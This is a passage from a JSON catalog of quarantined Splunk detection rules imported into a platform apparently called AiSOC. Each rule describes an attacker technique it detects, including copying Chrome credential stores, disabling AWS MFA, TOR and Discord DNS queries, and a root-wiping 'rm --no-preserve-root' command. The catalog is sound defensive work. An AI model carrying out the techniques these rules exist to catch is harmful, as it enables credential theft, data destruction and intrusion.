focusing on process names and parent process names. This activity is significant because \"sudo\" and \"su\" commands are commonly used by adversaries to elevate privileges, potentially leading to unauthorized access or control over the system. 
If confirmed malicious, this activity could allow attackers to execute commands with root privileges, leading to severe security breaches, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-sudo-or-su-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4b00f134-6d6a-11ec-a90c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_sudo_or_su_execution.yml" } }, { "id": "splunk-security-content-4b4f8fdd-1f9e-45d8-9b0f-1f64c0b297a4", "type": "detection", "name": "Cisco ASA - Core Syslog Message Volume Drop", "description": "Adversaries may intentionally suppress or reduce the volume of core Cisco ASA syslog messages to evade detection or cover their tracks. This hunting search is recommended to proactively identify suspicious downward shifts or absences in key syslog message IDs, which may indicate tampering or malicious activity. 
Visualizing this data in Splunk dashboards enables security teams to quickly spot anomalies and investigate potential compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-core-syslog-message-volume-drop.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4b4f8fdd-1f9e-45d8-9b0f-1f64c0b297a4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___core_syslog_message_volume_drop.yml" } }, { "id": "splunk-security-content-4bc788d3-c83a-48c5-a4e2-e0c6dba57889", "type": "detection", "name": "Windows Modify Registry DisAllow Windows App", "description": "The following analytic detects modifications to the Windows registry aimed at preventing the execution of specific computer programs. It leverages data from the Endpoint.Registry datamodel, focusing on changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun*\" with a value of \"0x00000001\". This activity is significant as it can indicate an attempt to disable security tools, a tactic used by malware like Azorult. 
If confirmed malicious, this could allow an attacker to evade detection and maintain persistence on the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disallow-windows-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4bc788d3-c83a-48c5-a4e2-e0c6dba57889", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disallow_windows_app.yml" } }, { "id": "splunk-security-content-4be54858-432f-11ec-8209-3e22fbd008af", "type": "detection", "name": "Scheduled Task Creation on Remote Endpoint using At", "description": "The following analytic detects the creation of scheduled tasks on remote Windows endpoints using the at.exe command. This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process creation events involving at.exe with remote command-line arguments. Identifying this activity is significant for a SOC as it may indicate lateral movement or remote code execution attempts by an attacker. 
If confirmed malicious, this activity could lead to unauthorized access, persistence, or execution of malicious code, potentially resulting in data theft or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/scheduled-task-creation-on-remote-endpoint-using-at.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4be54858-432f-11ec-8209-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/scheduled_task_creation_on_remote_endpoint_using_at.yml" } }, { "id": "splunk-security-content-4c2d198b-da58-48d7-ba27-9368732d0054", "type": "detection", "name": "Windows Multi hop Proxy TOR Website Query", "description": "The following analytic identifies DNS queries to known TOR proxy websites, such as \"*.torproject.org\" and \"www.theonionrouter.com\". It leverages Sysmon EventCode 22 to detect these queries by monitoring DNS query events from endpoints. This activity is significant because adversaries often use TOR proxies to disguise the source of their malicious traffic, making it harder to trace their actions. 
If confirmed malicious, this behavior could indicate an attempt to obfuscate network traffic, potentially allowing attackers to exfiltrate data or communicate with command and control servers undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multi-hop-proxy-tor-website-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4c2d198b-da58-48d7-ba27-9368732d0054", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_multi_hop_proxy_tor_website_query.yml" } }, { "id": "splunk-security-content-4c38c264-1f74-11ec-b5fa-acde48001122", "type": "detection", "name": "Logon Script Event Trigger Execution", "description": "The following analytic detects the modification of the UserInitMprLogonScript registry entry, which is often used by attackers to establish persistence and gain privilege escalation upon system boot. It leverages data from the Endpoint.Registry data model, focusing on changes to the specified registry path. This activity is significant because it is a common technique used by APT groups and malware to ensure their payloads execute automatically when the system starts. 
If confirmed malicious, this could allow attackers to maintain persistent access and potentially escalate their privileges on the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1037.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/logon-script-event-trigger-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4c38c264-1f74-11ec-b5fa-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/logon_script_event_trigger_execution.yml" } }, { "id": "splunk-security-content-4c461f5a-c2cc-4e86-b132-c262fc9edca7", "type": "detection", "name": "Windows Special Privileged Logon On Multiple Hosts", "description": "The following analytic detects a user authenticating with special privileges on 30 or more remote endpoints within a 5-minute window. It leverages Event ID 4672 from Windows Security logs to identify this behavior. This activity is significant as it may indicate lateral movement or remote code execution by an adversary. If confirmed malicious, the attacker could gain extensive control over the network, potentially leading to privilege escalation, data exfiltration, or further compromise of the environment. 
Security teams should adjust detection thresholds based on their specific environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087", "T1021.002", "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-special-privileged-logon-on-multiple-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4c461f5a-c2cc-4e86-b132-c262fc9edca7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_special_privileged_logon_on_multiple_hosts.yml" } }, { "id": "splunk-security-content-4cc015c9-687c-40d2-adcc-46350f66e10c", "type": "detection", "name": "Windows Office Product Loaded MSHTML Module", "description": "The following analytic detects the loading of the mshtml.dll module into an Office product, which is indicative of CVE-2021-40444 exploitation. It leverages Sysmon EventID 7 to monitor image loads by specific Office processes. This activity is significant because it can indicate an attempt to exploit a vulnerability in the MSHTML component via a malicious document. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further network penetration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-loaded-mshtml-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4cc015c9-687c-40d2-adcc-46350f66e10c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_loaded_mshtml_module.yml" } }, { "id": "splunk-security-content-4d1409df-40c7-4b11-aec4-bd0e709dfc12", "type": "detection", "name": "Windows Modify Registry Auto Update Notif", "description": "The following analytic detects a suspicious modification to the Windows registry that changes the auto-update notification setting to \"Notify before download.\" This detection leverages data from the Endpoint.Registry data model, focusing on specific registry paths and values. This activity is significant because it is a known technique used by adversaries, including malware like RedLine Stealer, to evade detection and potentially deploy additional payloads. 
If confirmed malicious, this modification could allow attackers to bypass security measures, maintain persistence, and exploit vulnerabilities on the target host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-auto-update-notif.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d1409df-40c7-4b11-aec4-bd0e709dfc12", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_auto_update_notif.yml" } }, { "id": "splunk-security-content-4d14c86d-fdee-4393-94da-238d2706902f", "type": "detection", "name": "Windows Credentials from Password Stores Chrome Copied in TEMP Dir", "description": "The following analytic detects the copying of Chrome's Local State and Login Data files into temporary folders, a tactic often used by the Braodo stealer malware. These files contain encrypted user credentials, including saved passwords and login session details. The detection monitors for suspicious copying activity involving these specific Chrome files, particularly in temp directories where malware typically processes the stolen data. 
Identifying this behavior enables security teams to act quickly, preventing attackers from decrypting and exfiltrating sensitive browser credentials and mitigating the risk of unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-chrome-copied-in-temp-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d14c86d-fdee-4393-94da-238d2706902f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_chrome_copied_in_temp_dir.yml" } }, { "id": "splunk-security-content-4d28013d-3a0f-4d65-a33f-4e8009fee0ae", "type": "detection", "name": "O365 Email Security Feature Changed", "description": "The following analytic identifies when specific O365 advanced security settings are altered within the Office 365 tenant. If an attacker successfully disables O365 security settings, they can operate within the tenant with reduced risk of detection. 
This can lead to unauthorized data access, data exfiltration, account compromise, or other malicious activities without leaving a detailed audit trail.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-security-feature-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d28013d-3a0f-4d65-a33f-4e8009fee0ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_security_feature_changed.yml" } }, { "id": "splunk-security-content-4d2df5e0-1092-4817-88a8-79c7fa054668", "type": "detection", "name": "ASL AWS Multi-Factor Authentication Disabled", "description": "The following analytic detects attempts to disable multi-factor authentication (MFA) for an AWS IAM user. It leverages Amazon Security Lake logs, specifically monitoring for `DeleteVirtualMFADevice` or `DeactivateMFADevice` API operations. This activity is significant as disabling MFA can indicate an adversary attempting to weaken account security to maintain persistence using a compromised account. 
If confirmed malicious, this action could allow attackers to retain access to the AWS environment without detection, potentially leading to unauthorized access to sensitive resources and prolonged compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-multi-factor-authentication-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d2df5e0-1092-4817-88a8-79c7fa054668", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_multi_factor_authentication_disabled.yml" } }, { "id": "splunk-security-content-4d33a488-5b5f-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious mshta spawn", "description": "The following analytic detects the spawning of mshta.exe by wmiprvse.exe or svchost.exe. This behavior is identified using Endpoint Detection and Response (EDR) data, focusing on process creation events where the parent process is either wmiprvse.exe or svchost.exe. This activity is significant as it may indicate the use of a DCOM object to execute malicious scripts via mshta.exe, a common tactic in sophisticated attacks. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to system compromise and further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-mshta-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d33a488-5b5f-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_mshta_spawn.yml" } }, { "id": "splunk-security-content-4d347c4a-306e-41db-8d10-b46baf71b3e2", "type": "detection", "name": "AWS Credential Access GetPasswordData", "description": "The following analytic identifies more than 10 GetPasswordData API calls within a 5-minute window in your AWS account. It leverages AWS CloudTrail logs to detect this activity by counting the distinct instance IDs accessed. This behavior is significant as it may indicate an attempt to retrieve encrypted administrator passwords for running Windows instances, which is a critical security concern. 
If confirmed malicious, attackers could gain unauthorized access to administrative credentials, potentially leading to full control over the affected instances and further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-credential-access-getpassworddata.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d347c4a-306e-41db-8d10-b46baf71b3e2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_credential_access_getpassworddata.yml" } }, { "id": "splunk-security-content-4d3a17b3-0a6d-4ae0-9421-46623a69c122", "type": "detection", "name": "Kubernetes Suspicious Image Pulling", "description": "The following analytic detects suspicious image pulling in Kubernetes environments. It identifies this activity by monitoring Kubernetes audit logs for image pull requests that do not match a predefined list of allowed images. This behavior is significant for a SOC as it may indicate an attacker attempting to deploy malicious software or infiltrate the system. 
If confirmed malicious, the impact could be severe, potentially leading to unauthorized access to sensitive systems or data, and enabling further malicious activities within the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-suspicious-image-pulling.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d3a17b3-0a6d-4ae0-9421-46623a69c122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_suspicious_image_pulling.yml" } }, { "id": "splunk-security-content-4d4332ae-792c-11ec-89c1-acde48001122", "type": "detection", "name": "Suspicious Process With Discord DNS Query", "description": "The following analytic identifies a process making a DNS query to Discord, excluding legitimate Discord application paths. It leverages Sysmon logs with Event ID 22 to detect DNS queries containing \"discord\" in the QueryName field. This activity is significant because Discord can be abused by adversaries to host and download malicious files, as seen in the WhisperGate campaign. 
If confirmed malicious, this could indicate malware attempting to download additional payloads from Discord, potentially leading to further code execution and compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-process-with-discord-dns-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d4332ae-792c-11ec-89c1-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/suspicious_process_with_discord_dns_query.yml" } }, { "id": "splunk-security-content-4d5a05fa-77d9-4fd0-af9c-05704f9f9a88", "type": "detection", "name": "Linux APT Privilege Escalation", "description": "The following analytic detects the use of the Advanced Package Tool (APT) or apt-get with elevated privileges via sudo on Linux systems. It leverages Endpoint Detection and Response (EDR) telemetry to identify processes where APT commands are executed with sudo rights. This activity is significant because it indicates a user can run system commands as root, potentially leading to unauthorized root shell access. 
If confirmed malicious, this could allow an attacker to escalate privileges, execute arbitrary commands, and gain full control over the affected system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-apt-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d5a05fa-77d9-4fd0-af9c-05704f9f9a88", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_apt_privilege_escalation.yml" } }, { "id": "splunk-security-content-4d7e8f3a-9c2b-4e6f-8a1d-5b9c7e2f4a8c", "type": "detection", "name": "Cisco ASA - Device File Copy Activity", "description": "This analytic detects file copy activity on Cisco ASA devices via CLI or ASDM.\nAdversaries may copy device files including configurations, logs, packet captures, or system files for reconnaissance, credential extraction, or data exfiltration. 
While legitimate file operations occur during backups and maintenance, unauthorized copies may indicate malicious activity.\nThe detection monitors for command execution events (message ID 111008 or 111010) containing copy commands targeting running-config, startup-config, packet capture files, or other system files from disk0:, flash:, system:, or capture: locations.\nInvestigate unexpected file copies, especially from non-administrative accounts, during unusual hours, or when combined with other suspicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005", "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-device-file-copy-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d7e8f3a-9c2b-4e6f-8a1d-5b9c7e2f4a8c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___device_file_copy_activity.yml" } }, { "id": "splunk-security-content-4da5ce1a-f71b-4e71-bb73-c0a3c73f3c3c", "type": "detection", "name": "Linux Auditd Data Destruction Command", "description": "The following analytic detects the execution of a Unix shell command designed to wipe root directories on a Linux host. It leverages data from Linux Auditd, focusing on the 'rm' command with force recursive deletion and the '--no-preserve-root' option. This activity is significant as it indicates potential data destruction attempts, often associated with malware like Awfulshred. 
If confirmed malicious, this behavior could lead to severe data loss, system instability, and compromised integrity of the affected Linux host. Immediate investigation and response are crucial to mitigate potential damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-data-destruction-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4da5ce1a-f71b-4e71-bb73-c0a3c73f3c3c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_data_destruction_command.yml" } }, { "id": "splunk-security-content-4de73044-9a1d-4a51-a1c2-85267d8dcab3", "type": "detection", "name": "Linux Auditd Find Credentials From Password Stores", "description": "The following analytic detects suspicious attempts to find credentials stored in password stores, indicating a potential attacker's effort to access sensitive login information. Password stores are critical repositories that contain valuable credentials, and unauthorized access to them can lead to significant security breaches. 
By monitoring for unusual or unauthorized activities related to password store access, this analytic helps identify potential credential theft attempts, allowing security teams to respond promptly and prevent unauthorized access to critical systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-find-credentials-from-password-stores.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4de73044-9a1d-4a51-a1c2-85267d8dcab3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_find_credentials_from_password_stores.yml" } }, { "id": "splunk-security-content-4df275fd-a0e5-4246-8b92-d3201edaef7a", "type": "detection", "name": "O365 ZAP Activity Detection", "description": "The following analytic detects when the Microsoft Zero-hour Automatic Purge (ZAP) capability takes action against a user's mailbox. This capability is an enhanced protection feature that retro-actively removes email with known malicious content for user inboxes. 
Since this is a retroactive capability, there is still a window in which the user may fall victim to the malicious content.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-zap-activity-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4df275fd-a0e5-4246-8b92-d3201edaef7a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_zap_activity_detection.yml" } }, { "id": "splunk-security-content-4e127857-1fc9-4c95-9d69-ba24c91d52d7", "type": "detection", "name": "ConnectWise ScreenConnect Path Traversal Windows SACL", "description": "The following analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability using Windows SACL EventCode 4663. It identifies path traversal attacks by monitoring file system events related to the ScreenConnect service. This activity is significant as it allows unauthorized access to sensitive files and directories, potentially leading to data exfiltration or arbitrary code execution. If confirmed malicious, attackers could gain unauthorized access to critical data or execute harmful code, compromising the integrity and security of the affected system. 
Immediate remediation by updating to version 23.9.8 or above is recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/connectwise-screenconnect-path-traversal-windows-sacl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e127857-1fc9-4c95-9d69-ba24c91d52d7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/connectwise_screenconnect_path_traversal_windows_sacl.yml" } }, { "id": "splunk-security-content-4e12db1f-f7c7-486d-8152-a221cad6ac2b", "type": "detection", "name": "O365 New MFA Method Registered", "description": "The following analytic detects the registration of a new Multi-Factor Authentication (MFA) method for a user account within Office 365. It leverages O365 audit logs to identify changes in MFA configurations. This activity is significant as it may indicate an attacker's attempt to maintain persistence on a compromised account. If confirmed malicious, the attacker could bypass existing security measures, solidify their access, and potentially escalate privileges or access sensitive data. 
Immediate verification and remediation are required to secure the affected account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-new-mfa-method-registered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e12db1f-f7c7-486d-8152-a221cad6ac2b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_new_mfa_method_registered.yml" } }, { "id": "splunk-security-content-4e3c26f2-4fb9-4bd7-ab46-1b76ffa2a23b", "type": "detection", "name": "AWS New MFA Method Registered For User", "description": "The following analytic detects the registration of a new Multi-Factor Authentication (MFA) method for an AWS account. It leverages AWS CloudTrail logs to identify the `CreateVirtualMFADevice` event. This activity is significant because adversaries who gain unauthorized access to an AWS account may register a new MFA method to maintain persistence. 
If confirmed malicious, this could allow attackers to secure their access, making it difficult to detect and remove their presence, potentially leading to further unauthorized activities and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-new-mfa-method-registered-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e3c26f2-4fb9-4bd7-ab46-1b76ffa2a23b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_new_mfa_method_registered_for_user.yml" } }, { "id": "splunk-security-content-4e3e3b8c-6d3a-4b47-9f5a-9e3e0a0a6f2f", "type": "detection", "name": "Windows Cabinet File Extraction Via Expand", "description": "Detects usage of expand.exe to extract Microsoft Cabinet (CAB) archives, with\nemphasis on extractions into `C:\\\\ProgramData` or similar staging locations. In\nrecent APT37 activity, a CAB payload (e.g., wonder.cab) was expanded into\nProgramData prior to persistence and execution. 
